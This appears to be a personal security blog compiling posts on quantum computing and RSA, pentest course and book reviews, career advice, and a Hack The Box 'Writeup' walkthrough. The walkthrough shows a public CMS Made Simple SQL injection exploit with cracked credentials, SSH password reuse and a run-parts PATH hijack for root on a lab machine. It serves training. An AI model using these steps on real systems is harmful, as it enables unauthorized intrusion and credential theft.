Author: Daniel

Quantum Computing and IT security implications

This article is not for learning quantum computing (I am not the right person for that), but to understand some of the implications for IT security and maybe give some help in taking the very first steps.

Introduction to Quantum Computing for Dummies

Since it is so popular let us ask ChatGPT:

OK, know that it is all clear, let’s move on!

I watched these as an easy to understand introduction into this complex topic.

Quantum Computers Explained in a Way Anyone Can Understand

Dig deeper into Quantum computing

If you want to dig deeper have a look at this article, which also links some free introducing books:

https://builtin.com/software-engineering-perspectives/how-to-learn-quantum-computing

This also looks interesting:

https://towardsdatascience.com/the-ultimate-beginners-guide-to-quantum-computing-and-its-applications-5b43c8fbcd8f

Braking RSA

A current discussion is when/how RSA will be broke.

RSA’s demise from quantum attacks is very much exaggerated, expert says

Expert says the focus on quantum attacks may distract us from more immediate threats.

https://arstechnica.com/information-technology/2023/01/fear-not-rsa-encryption-wont-fall-to-quantum-computing-anytime-soon/

One more article about this topic:

Fujitsu: Quantum computers no threat to encryption just yet comment bubble on black

Heavily hyped tech bound for some sort of milestone by decade end

https://www.theregister.com/2023/01/24/fujitsu_quantum_encryption/

Implications in depth

And if you want to dig deeper in these topics here are three fantastic resources:

Quantum computers are nuclear weapons of the tech – but their potential is immeasurable

As scientists across the world express their excitement about the development of quantum technology, others are worried about the dangers it poses to today’s encryption and the potential benefits it could offer to cybercriminals.

https://cybernews.com/crypto/quantum-computers-promises/

Ensure to watch the video at the end:

The Story of Shor’s Algorithm, Straight From the Source | Peter Shor

How Quantum Computers Break Encryption | Shor’s Algorithm Explained

Conclusion

For me it is hard to look into the future here, this field is much too complex and I have only some basic understanding. From what I see at the current point there is no direct impact and we all should be aware that there is also some hype. Maybe you should start to consider what might happen if your current encryption will be broke in the future. I hope I showed a path for starting research for everyone who is interested.

Quantum Computing can have great impact on lot’s of fields, obviously IT security and encryption is only a very small fraction of it. I wonder what it will mean for all STEM fields like astronomy, material research, medicine, understanding the brain, the universe and all the rest.

Course Review: Active Directory Pentesting Full Course – Red Team Hacking

Link: https://www.udemy.com/course/active-directory-red-team-hacking/

Content

Tactics & Techniques

  • local/domain  privilege escalations
  • local/domain  enumaration
  • lateral movement
  • perstistance

Used Tools

  • Powersploit
  • Mimikatz
  • Metasploit
  • Sherlock/Watson
  • Rubeus

Conclusion

  • goes not too deep, so a good coverage but sometimes explanations are missing
  • practical examples
  • also runs into problems sometimes without deleting them, which is good to see imho
  • if you want to run the examples by yourself you will need to setup your own lab
  • you should have some prior knowledge, for example in Powershell, ADS, networking and pentesting in general
  • this is a beginner course for ADS red teaming
  • I gave 4/5 stars and for that price I can recommend the course
  • Hint: wait for discounts at udemy

Softskills: CV, Job Application and Interviews

This one might be a bit too specific, since every country has its own CV and interview culture. For example in the US you don’t add a picture of yourself, in Germany this is very common. There should be much more differences, so please don’t take everything here for granted in the area or county where you want to get a job. I try to be as general as possible here.

From my previous post Softskills: Networking for your Career you should be aware that it is good to get a job over a personal network and could be the most promising option.

CV & Job Application

A couple of points for the CV & job application:

  • be honest, when people found out you lied or made things up you are out
  • don’t go into details that don’t have something to do with the job you are applying to, unless it seems necessary
  • everything else write detailed, I like to have much information, but other people might have a different opinion
  • take a clean and easy to read format
  • write a great motivation letter for your application
  • proof facts, for example if you write you have a certification add a copy or scan of it to the application
  • check for grammar and spelling
  • if possible let somebody read your application who can give good feedback

Job Interview

I was on both sides of the table, conducting interviews and also of course being the candidate.

  • know your CV well, you should be able to explain everything without looking it up
  • if you have a bad feeling you normaly should not take the job, unless it is a huge chance for you or you can use it for jumping to a better job
  • prepare for the interview, think about what questions might be asked
  • try to prepare for standart questions like
    • what was your biggest mistake
    • where do you see yourself in five years
    • what is your biggest weakness
    • what do you expect from your employer
    • and so on
  • prepare for technical questions
    • there is nothing worse for example when you say for example you know XSS but could not explain the difference between a stored and a reflected XSS
    • have a look at the Daniel Miessler interview questions (see also below)
  • if you have weak spots in your CV you can try to handle this pro-actively, if not prepare for critical questions
  • prepare questions that you want to ask, for me an interview always has to go into both directions

Links
https://us.experteer.com/magazine/should-you-put-a-photo-on-your-cv/
https://danielmiessler.com/study/infosec_interview_questions/
https://www.indeed.com/career-advice/resumes-cover-letters/motivation-letter

Softskills: Networking for your Career

Whether looking for a new job, enhancing your knowlege or finding like-minded people, networking is important for your career.

Social Networks

When I looked for my first job as a pentester I wrote to CEOs and company owners from smaller companies that I found interesting on Xing (which is manily active in Germany) and later I also used LinkedIn. I got invitations to interviews and found a job.

Further I use twitter, but not as much as I did 2-3 years ago. But you can still get information very quick when you follow the right people. For example when a PoC for an exploit is available it is posted fast here, but be careful and check the information.

On all networks you can use direct mail for contacting people when you have questions, in my experience most people are happy to help.

But how to start? First follow and add people you know. Search for people who might be interesting for you and also add/follow them. When contacting the first time, just say a few words about yourself. Share posts you find interesting and maybe start sending your own post, maybe a link to an interesting blog post you found interesting or a short course review.

You can also be successful without social media accounts, but for me it was a booster. It is also useful to stay in contact with people you meet at…

Conferences & Meet-ups

Another great place for networking is conferences and local meetings. At local meetings (I visited the OWASP meeting Cologne for some time) it is easy to get into touch with people in the area you live, you have presentations and can learn.

At conferences it depends strongly for me what you expect. For networking it might be better to go to smaller conferences, especialy if you don’t know anybody. Bigger conferences are also good, but maybe a bit overwhelming first.

You can get more contacts when participating actively, for example by giving a presentation or as a volunteer.

Or, when you are in the industry for a longer time, just meet with people you know.

And guess what? I got in touch with one of my employers at a conference.

Links

 

Career Path Red Teaming

For some people Red Teaming seems to be something like the holy grail and many people want to do it. In my opinion a Red Teamer should have experience in Penetration Testing before starting. Some experience  in DFIR might also be useful, or at least you should have some understanding of this topic.

For me (I am planning and leading internal Red Team engagements since about two years now), Red Teaming is very different from pentesting, although experience here is important.

“Penetration testers have this problem where they frequently can’t see past the end of their Kali USB. They establish the false equivalence of: “China hacked $X; I can hack $X; therefore, I am an APT and an APT is like me.” An APT is literally the instantiation of a nation state’s will. It is not a toolchain.” 
https://medium.com/@thegrugq/cyber-ignorethe-penetration-testers-900e76a49500

This sums up my experience. Some pentesters think: OK, let’s just use bloodhound, mimikatz and empire and and start firing, when I am domain admin it is red teaming. Well, maybe kind of.

But do real attackers think that way? Think more about WHY a malicious actor is trying to hack you, and then how. What are attackers looking for? That might define the scope of your engagement. You should read threat intel and incident reports for being up to date regarding TTPs and scope. When doing Red Teaming you should start thinking more into this direction.

I also tend to go through single scenarios, and not only full blown attack simulations, like:
• Account compromisation 
• Exfiltration if possible 
• APT traffic simulation for testing and enhancing capabilities of the blue team 
• Phishing 
• Water Holing 
• Malware Simulation 

This is also a good starting point for enhancing a penetration tester career, since usually you are not able to start with full blown Red Team engagments.

I can recommend “The Hacker Playbook” series, review for the third issue here. Further the book “Advanced Penetration Testing” is a good read.

More recommendations:
• https://www.cobaltstrike.com/training 
• https://medium.com/@thegrugq/cyber-ignore-the-penetration-testers-900e76a49500
• https://www.pentesteracademy.com/redlabs
• https://github.com/aptnotes
• https://attack.mitre.org/
• https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2019.pdf?__blob=publicationFile&v=3

Review: Effective Information Security Writing

Writing good reports is in my opinion one of the most import tasks for people who work in security, no matter if pentesting, forensics or other topics. The report is the final product of your work, it is leaving an impression even after some time and it represents your company, your department and yourself. Unfortunately some people underestimate this topic.

But there is a course with great content: Effective Information Security Writing by Chris Sanders.


Course Syllabus:
* Module 1: Telling a Story
* Module 2: Writing Penetration Testing Reports
* Module 3: Forensic Writing
* Module 4: Most Common Writing Mistakes

The price is pretty fair, 97$ at the time of this writing. Even folks who don’t like to write reports gave me great feedback, and for myself I can highly recommend it. It takes about 6-8h for going through, you have access to forums and in the end you get a certificate of completion. Although writing lot’s of reports over the past years I got some great new ideas for imrovement.

More about that topic:
https://twitter.com/ZephrFish/status/1246802541293248512
https://chrissanders.org/training/writing/
https://www.networkdefense.io/library/effective-information-security-writing/55514/about/
https://briannefahey.com/2018/02/effective-information-security-writing
https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf

Review Pentester Academy and AttackDefense Labs

Hello All, this is a review of Pentest Academy and AttackDefense Labs. The content is really huge:

Screenshot from: https://www.pentesteracademy.com/

So it is not possible to review all of it, this post is just meant to give a rough overview and some examples.

Pentester Academy

As said before, in the courses sections are 40+ courses available. The topics include for example (all from a security perspective, but some are also from a defenders viewpoint): Python, ADS, shellcoding (I made SLAE 2015, helped me also with my OSCE certification), Javascript, web app pentesting, some forensics topics, WiFi and network pentesting, exploitation and much more.

For a complete overview have a look here.

Currently I started the course Traffic Analysis: Tshark unleashed, so this is the short example for this post.

Screenshot from the Tshark course.

What comes really handy is that you can just start the labs in the AttackDefense labs, so you don’t need to setup own VMs only for following the courses:

Screenshot from one of the Traffic Analysis: Tshark unleashed course

What is also great, you can download the videos, so you can also watch them later.

As far as I can say, all the videos are suitable more or less for beginners.

AttackDefense Labs

The labs include a huge amount of topics, including: Webapps, MSF, Pivilege Escalation, Eploiting, Wi-Fi, Forensincs, Reversing, Cracking, Python and so on. Some labs include a small task, but others include for example full blown webapps like juiceshop.

Some examples from the Wab Apps labs.

In this case there was a small issue (for me), the labs are timing out after some time, which might be a bit annoying when having a full web app. For the smaller labs I never had problems.

As advanced labs there are also some CTF style labs available.

Verifiable Badges

With verifiable badges it is possible to verfiy your knowlege to an external source, as I did here:

“The holder of this badge has successfully completed the Network Pentesting challenge exercises in Pentester Academy’s AttackDefense labs. These challenge exercises test a practical understanding of how to perform remote network reconnaissance of various infrastructure components.”
(https://www.credential.net/b5050be1-05c9-41fa-93a9-ea0b5cd8825f#.Xg8KBMQX5XM.twitter)

As far as I could see all badges have three small challenges where you have to find flags (like a small CTF), badges are available for lot’s of topics (19 badges are available at the time of this writing) and most of them can be done after you viewed and worked through the courses.

Certifications

It is also possible to take certification exams (like the SLAE): https://www.pentesteracademy.com/exam

This way it is possible to take exams from pentestacademy (if you subscribed) without buying the whole course.

Pricing at time of this writing

Conclusion

My conclusion after using it for myself and speaking to some folks who also using it:

  • it is affordable
  • the content is huge
  • the courses are a great resource espeacially for beginners
  • courses and labs suite for attackers and defenders
  • I like the badges

For me Pentester Academy and AttackDefense Labs is highly recommended.

Links

Hackthebox writeup

Yes, the machine itself is called writeup. My first step was running nmap:

 # nmap  10.10.10.138
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-03 21:54 CEST
Nmap scan report for 10.10.10.138
Host is up (0.021s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 4.74 seconds


# nmap -A -p 22,80 10.10.10.138
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-03 22:06 CEST
Nmap scan report for 10.10.10.138
Host is up (0.022s latency).


PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   20.28 ms 10.10.12.1
2   20.47 ms 10.10.10.138


OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds

More info gathering of the web service

As you can see CMS Made Simple is being used.

Exploitation of the website

After digging around a bit with sqlmap and Burp without success I searched for an exploit, and voila:
https://packetstormsecurity.com/files/152356/CMS-Made-Simple-SQL-Injection.html

The exploit was also able to crack, so I used rockyou.txt as a wordlist:

# python cmsmadesimple22-sql.py -u http://10.10.10.138/writeup/ -c -w ./rockyou.txt

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9

Login to cms is protected with a .htaccess file, creds are not valid here. Good that there is a thing called password re-use.

User flag

But ssh worked with the creds:

# ssh jkr@10.10.10.138
jkr@10.10.10.138's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux


The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.


Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul  4 14:51:59 2019 from 10.10.12.57
jkr@writeup:~$
jkr@writeup:~$ ls
pspy64s user.txt
jkr@writeup:~$ cat user.txt
d4e493fd4068afc9eb1aa6a55319f978

So user flag was done…

Root flag

For escalating to root I first used exploit suggester and tried the exploits, but without success.

So I did some research and came across a tool called pyspy. For transfering the file I used apache and wget.

jkr@writeup:/tmp$ ./pspy64
...
root      2456  0.0  0.6 108644  6940 ?        Ss   15:10   0:00 sshd: jkr [priv]
root      2468  0.0  0.0   4276   756 ?        S    15:10   0:00 sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
root      2469  0.0  1.0  40364 10348 ?        S    15:10   0:00 /usr/bin/python /usr/local/bin/run-parts --lsbsysinit /etc/update-motd.d
root      2470  0.0  0.0   4276   732 ?        S    15:10   0:00 /bin/sh -i 
...

What does that mean? run-parts is executing all files in /usr/local/bin/run-parts. If we can put a file here we win.

The file looks like:

cat /root/root.txt >> /tmp/.testing

Then it is straight forward:

jkr@writeup:/tmp$ vi /usr/local/sbin/run-parts
jkr@writeup:/tmp$ chmod +x  /usr/local/sbin/run-parts
jkr@writeup:/tmp$ ls -al
total 4380
drwxrwxrwt  2 root root    4096 Jul  7 16:30 .
drwxr-xr-x 22 root root    4096 Apr 19 07:31 ..
-rw-r--r--  1 root root      33 Jul  7 16:30 .testing
jkr@writeup:/tmp$ cat .testing
eeba47f60b48ef92b734f9b6198d7226

And that was it :).

Usefull add-ons for Webapp Pentesting and Bug Bounty

So here is just a very short one. Always when I have to set up a new pentest machine, I have to look it up again, so here is a small list of browser addons that are usefull for webapp pentesting (using Firefox):

  • wappalyzer
  • Temp Mail
  • Hackbar Quantum
  • retire.js
  • Foxy Proxy Basic
  • shodan.io
  • Export Cookies

Book review: Real-World Bug Hunting

One of the good things about Defcon is that there is a No Starch Press store at the vendors area. 

So I bought it for the flight, but it took a bit longer until I was through the book.

The book has 20 chapters, starting with Bug Bounty Basics. The next 17 chapters go through different classes of vulnerabitlites like XSS, SQLi, memory corruption, CSRF and so on.

After an explanation of the vulnerabilty itself, real reports are also included with further hints. At the end of each chapter the reader can find useful takeaways.

The last two chapters are not about bugs, one is about finding bugs in general, including some descriptions for tactics and tools. The last chapter is about writing a good report, communication to the companies and how to deal with the different programmes, which seems very useful to me.

Real-World Bug Hunting is helping to maximaize payouts and finding more bugs. It shows up lots of attack vectors and creative way for exploing them.

The book is not for beginners. I recommend to have a look at the recommendations list, the bug bounty beginners and the penetration tester basics articles for more resources.

Real-World Bug Hunting: A Field Guide to Web Hacking
Author: Peter Yaworski
Content: A very practical guide to bug hunting and bug bounties
Career: Penetration Tester, Bug Bounty
Level: Beginner, Intermediate